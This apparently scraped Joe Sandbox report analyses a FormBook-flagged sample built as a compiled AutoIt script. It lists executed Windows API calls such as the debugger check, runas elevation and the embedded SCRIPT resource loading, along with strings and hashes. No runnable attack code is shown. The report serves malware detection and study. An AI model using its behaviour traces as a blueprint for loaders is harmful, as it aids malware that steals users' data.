Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4250197386.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4250197386.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:14:46
Start date:	08/06/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	180

Executed Functions

Function 00D03B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D03B7A
IsDebuggerPresent.KERNEL32 ref: 00D03B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00DC62F8,00DC62E0,?,?), ref: 00D03BFD

Part of subcall function 00D07D2C: _memmove.LIBCMT ref: 00D07D66

Part of subcall function 00D10A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D03C26,00DC62F8,?,?,?), ref: 00D10ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00D03C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00DB93F0,00000010), ref: 00D3D4BC
SetCurrentDirectoryW.KERNEL32(?,00DC62F8,?,?,?), ref: 00D3D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00DB5D40,00DC62F8,?,?,?), ref: 00D3D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00D3D581

Part of subcall function 00D03A58: GetSysColorBrush.USER32(0000000F), ref: 00D03A62
Part of subcall function 00D03A58: LoadCursorW.USER32(00000000,00007F00), ref: 00D03A71
Part of subcall function 00D03A58: LoadIconW.USER32(00000063), ref: 00D03A88
Part of subcall function 00D03A58: LoadIconW.USER32(000000A4), ref: 00D03A9A
Part of subcall function 00D03A58: LoadIconW.USER32(000000A2), ref: 00D03AAC
Part of subcall function 00D03A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D03AD2
Part of subcall function 00D03A58: RegisterClassExW.USER32(?), ref: 00D03B28

Part of subcall function 00D039E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D03A15
Part of subcall function 00D039E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D03A36
Part of subcall function 00D039E7: ShowWindow.USER32(00000000,?,?), ref: 00D03A4A
Part of subcall function 00D039E7: ShowWindow.USER32(00000000,?,?), ref: 00D03A53

Part of subcall function 00D043DB: _memset.LIBCMT ref: 00D04401
Part of subcall function 00D043DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D044A6

Strings

This is a third-party compiled AutoIt script., xrefs: 00D3D4B4
runas, xrefs: 00D3D575

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: b3fd0d4dd53ead23dc3a8d99ac2a057d4521313dc75f03d519a96dc34cf6ae63
Instruction ID: 13d91279fbf94ff9e7b376b4da4f6679747ce85151b50faea1b93866181727bd
Opcode Fuzzy Hash: b3fd0d4dd53ead23dc3a8d99ac2a057d4521313dc75f03d519a96dc34cf6ae63
Instruction Fuzzy Hash: 9951D170E0434AAEDB11ABB4EC05FEDBB79EF05700F044169F459E62E1DA709646CB39

Function 00D04AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00D04B2B

Part of subcall function 00D07D2C: _memmove.LIBCMT ref: 00D07D66

GetCurrentProcess.KERNEL32(?,00D8FAEC,00000000,00000000,?), ref: 00D04BF8
IsWow64Process.KERNEL32(00000000), ref: 00D04BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00D04C45
FreeLibrary.KERNEL32(00000000), ref: 00D04C50
GetSystemInfo.KERNEL32(00000000), ref: 00D04C81
GetSystemInfo.KERNEL32(00000000), ref: 00D04C8D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 60399f1f8079ab3489594e935418152b3912dcd9568d79799b00f9085ec69524
Instruction ID: 355dff5c552fc60060e8d56234adb8d97945c1e67f72f4fe832155cfb3836899
Opcode Fuzzy Hash: 60399f1f8079ab3489594e935418152b3912dcd9568d79799b00f9085ec69524
Instruction Fuzzy Hash: 3991C37194A7C0DEC731CB6894516AAFFE5AF29300F48499ED1CF93A81D230E948CB39

Function 00D04FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D04EEE,?,?,00000000,00000000), ref: 00D04FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D04EEE,?,?,00000000,00000000), ref: 00D05010
LoadResource.KERNEL32(?,00000000,?,?,00D04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00D04F8F), ref: 00D3DD60
SizeofResource.KERNEL32(?,00000000,?,?,00D04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00D04F8F), ref: 00D3DD75
LockResource.KERNEL32(00D04EEE,?,?,00D04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00D04F8F,00000000), ref: 00D3DD88

Strings

SCRIPT, xrefs: 00D05006

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 0e7bac173bc07f8fffc747c85b1ac2bb1f9cd9a620292dc132861af1b7651ffd
Instruction ID: f3858daadbe30ba49d9d10de77b0ab66e5f76e80545dd9e06b901f12ec004dd0
Opcode Fuzzy Hash: 0e7bac173bc07f8fffc747c85b1ac2bb1f9cd9a620292dc132861af1b7651ffd
Instruction Fuzzy Hash: 97112E75240701AFD7218B65EC58F6B7BB9EBC9B51F244568F809D62A0DB61E8008A70

Function 00D64696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00D3E7C1), ref: 00D646A6
FindFirstFileW.KERNELBASE(?,?), ref: 00D646B7
FindClose.KERNEL32(00000000), ref: 00D646C7

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: d878573a699a8a459aa428097767b72c04551958cf31e3231822e295b0521e54
Instruction ID: 8903e254b9f38c938c9463622bbf5d87c9bb6f1462b20e9d247a6103397c3151
Opcode Fuzzy Hash: d878573a699a8a459aa428097767b72c04551958cf31e3231822e295b0521e54
Instruction Fuzzy Hash: 4CE026328206006B8210A778EC4D8EA7B9CDE46335F100726F835C26E0EBB09D6487FA

Function 00D0E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00D4428C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 99d1c7a17bec49e31bc734f8e468cae89fc0c56c1f1d174f294f5582ab4d3463
Instruction ID: 53b18f64a58fb1844d0505324d4abb65c57688bea805f4469d36369b63a76a4f
Opcode Fuzzy Hash: 99d1c7a17bec49e31bc734f8e468cae89fc0c56c1f1d174f294f5582ab4d3463
Instruction Fuzzy Hash: 80A25B75A04216CBCB24CF58C480BADB7B1FF58310F288459E95AAB391D775ED82CBB1

Function 00D10B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D10BBB
timeGetTime.WINMM ref: 00D10E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D10FB3
TranslateMessage.USER32(?), ref: 00D10FC7
DispatchMessageW.USER32(?), ref: 00D10FD5
Sleep.KERNEL32(0000000A), ref: 00D10FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 00D1105A
DestroyWindow.USER32 ref: 00D11066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D11080
Sleep.KERNEL32(0000000A,?,?), ref: 00D452AD
TranslateMessage.USER32(?), ref: 00D4608A
DispatchMessageW.USER32(?), ref: 00D46098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D460AC

Strings

@GUI_WINHANDLE, xrefs: 00D453B9
@COM_EVENTOBJ, xrefs: 00D4591A
@GUI_CTRLID, xrefs: 00D45364
@TRAY_ID, xrefs: 00D45BB9
@GUI_CTRLHANDLE, xrefs: 00D4540E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 9dd2600d2c68c54284fcdfc40595933526d655757d924a2a4c478b9262a82f91
Instruction ID: d6a3c616f54c3f4f5b2016ba4a65c55e15a79b942488d91dd01c7bf75a9bb8bf
Opcode Fuzzy Hash: 9dd2600d2c68c54284fcdfc40595933526d655757d924a2a4c478b9262a82f91
Instruction Fuzzy Hash: 85B28F70608741DBD724DF24D885BAABBE5FF84304F18491DF58A97292DB71E884CBB2

Function 00D693DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D691E9: __time64.LIBCMT ref: 00D691F3

Part of subcall function 00D05045: _fseek.LIBCMT ref: 00D0505D

__wsplitpath.LIBCMT ref: 00D694BE

Part of subcall function 00D2432E: __wsplitpath_helper.LIBCMT ref: 00D2436E

_wcscpy.LIBCMT ref: 00D694D1
_wcscat.LIBCMT ref: 00D694E4
__wsplitpath.LIBCMT ref: 00D69509
_wcscat.LIBCMT ref: 00D6951F
_wcscat.LIBCMT ref: 00D69532

Part of subcall function 00D6922F: _memmove.LIBCMT ref: 00D69268
Part of subcall function 00D6922F: _memmove.LIBCMT ref: 00D69277

_wcscmp.LIBCMT ref: 00D69479

Part of subcall function 00D699BE: _wcscmp.LIBCMT ref: 00D69AAE
Part of subcall function 00D699BE: _wcscmp.LIBCMT ref: 00D69AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00D696DC
_wcsncpy.LIBCMT ref: 00D6974F
DeleteFileW.KERNEL32(?,?), ref: 00D69785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00D6979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D697AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D697BE

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 1f1420b4f16523dee7d4ac77103bb091e52c96e877bcbf0e569b6083ff8bc2cf
Instruction ID: 03351378e7113bb58531882e6a55db91dc9977db760ba7ca5bd5def5cb918215
Opcode Fuzzy Hash: 1f1420b4f16523dee7d4ac77103bb091e52c96e877bcbf0e569b6083ff8bc2cf
Instruction Fuzzy Hash: 06C129B1900229ABCF21DF95DC95AEEB7BDEF55310F0040AAF609E7251DB309A848F75

Function 00D03015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D03074
RegisterClassExW.USER32(00000030), ref: 00D0309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D030AF
InitCommonControlsEx.COMCTL32(?), ref: 00D030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D030DC
LoadIconW.USER32(000000A9), ref: 00D030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D03101

Strings

+, xrefs: 00D0305D
0, xrefs: 00D03056
TaskbarCreated, xrefs: 00D030A4
AutoIt v3 GUI, xrefs: 00D03090

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: e92416ca26dd357a2b2b03380189edd239c04433efab6a821c54e69e65bc0fa3
Instruction ID: 9f27646a7814527662fdcd77866a4afb3480012a19066ba9de55dcedea39438c
Opcode Fuzzy Hash: e92416ca26dd357a2b2b03380189edd239c04433efab6a821c54e69e65bc0fa3
Instruction Fuzzy Hash: CD3145B185530AAFEB009FA4DC85AC9BBF0FF09310F20456AE580E63A0E3B54545CF61

Function 00D03041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D03074
RegisterClassExW.USER32(00000030), ref: 00D0309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D030AF
InitCommonControlsEx.COMCTL32(?), ref: 00D030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D030DC
LoadIconW.USER32(000000A9), ref: 00D030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D03101

Strings

+, xrefs: 00D0305D
0, xrefs: 00D03056
TaskbarCreated, xrefs: 00D030A4
AutoIt v3 GUI, xrefs: 00D03090

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: bd60187bbeb81ec43b991598d89b9a83322da56a78d09d7c37616d0595e744ea
Instruction ID: 35e62be5baed0e64954703253321f156d23640918d306030c1f38e00de995b4e
Opcode Fuzzy Hash: bd60187bbeb81ec43b991598d89b9a83322da56a78d09d7c37616d0595e744ea
Instruction Fuzzy Hash: 8721B2B191131AAFEB00DFA4EC89B9DBBF4FB08710F10452AF911E63A0D7B185448FA5

Function 00D071EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D04864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00DC62F8,?,00D037C0,?), ref: 00D04882

Part of subcall function 00D2074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00D072C5), ref: 00D20771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D07308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D3ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D3ED32
RegCloseKey.ADVAPI32(?), ref: 00D3ED70
_wcscat.LIBCMT ref: 00D3EDC9

Strings

\Include\, xrefs: 00D072C5
\, xrefs: 00D3EDEC
Software\AutoIt v3\AutoIt, xrefs: 00D072FE
Include, xrefs: 00D3ECE8, 00D3ED29

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 2e98409c4e6ff20dabbf9ea310ae2845061a75df591ebce2e87224b2d1405b7f
Instruction ID: fdf074494fabb8459db2aa093816869a9f3dea1110ac4fa978f0637119dee7fd
Opcode Fuzzy Hash: 2e98409c4e6ff20dabbf9ea310ae2845061a75df591ebce2e87224b2d1405b7f
Instruction Fuzzy Hash: 94713871509302AEC714EF25E881AABFBA8FF58350F44452EF459C72A0EB309949CF75

Function 00D03A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D03A62
LoadCursorW.USER32(00000000,00007F00), ref: 00D03A71
LoadIconW.USER32(00000063), ref: 00D03A88
LoadIconW.USER32(000000A4), ref: 00D03A9A
LoadIconW.USER32(000000A2), ref: 00D03AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D03AD2
RegisterClassExW.USER32(?), ref: 00D03B28

Part of subcall function 00D03041: GetSysColorBrush.USER32(0000000F), ref: 00D03074
Part of subcall function 00D03041: RegisterClassExW.USER32(00000030), ref: 00D0309E
Part of subcall function 00D03041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D030AF
Part of subcall function 00D03041: InitCommonControlsEx.COMCTL32(?), ref: 00D030CC
Part of subcall function 00D03041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D030DC
Part of subcall function 00D03041: LoadIconW.USER32(000000A9), ref: 00D030F2
Part of subcall function 00D03041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D03101

Strings

#, xrefs: 00D03B0D
AutoIt v3, xrefs: 00D03B17
0, xrefs: 00D03B06

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: f2083a3f42b0b82af109379108a019725ae4697754e57ab7db431a3d29187b43
Instruction ID: dbc6637d4d184a3eda6c1a8cab3be86fc788ed8d388a95fe09502e32c45807a9
Opcode Fuzzy Hash: f2083a3f42b0b82af109379108a019725ae4697754e57ab7db431a3d29187b43
Instruction Fuzzy Hash: F9211971910306AFEF109FA4EC09F9DBBB5EB08711F10412AE504E63A0D3B696548FA8

Function 00D03633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00D036D2
KillTimer.USER32(?,00000001), ref: 00D036FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D0371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D0372A
CreatePopupMenu.USER32 ref: 00D0373E
PostQuitMessage.USER32(00000000), ref: 00D0375F

Strings

TaskbarCreated, xrefs: 00D03725

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 953d9a05e7ad52b0705bf9f191276d44d96eee64d7dbab806e6e5b211b333eff
Instruction ID: 7fb51f69451588a4bdc1dc550897df5dd96dddf56e5adea9b9785640b5543a35
Opcode Fuzzy Hash: 953d9a05e7ad52b0705bf9f191276d44d96eee64d7dbab806e6e5b211b333eff
Instruction Fuzzy Hash: 594115B2214207BBDB146F68EC09F7A375DEB44300F580129FA4AD73E1CAA2EE519775

Function 00D03778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteScript, xrefs: 00D038CE
CMDLINERAW, xrefs: 00D0380D
/AutoIt3OutputDebug, xrefs: 00D038A4
/ErrorStdOut, xrefs: 00D0388F
/AutoIt3ExecuteLine, xrefs: 00D038B9
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00D037C0
CMDLINE, xrefs: 00D03834

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

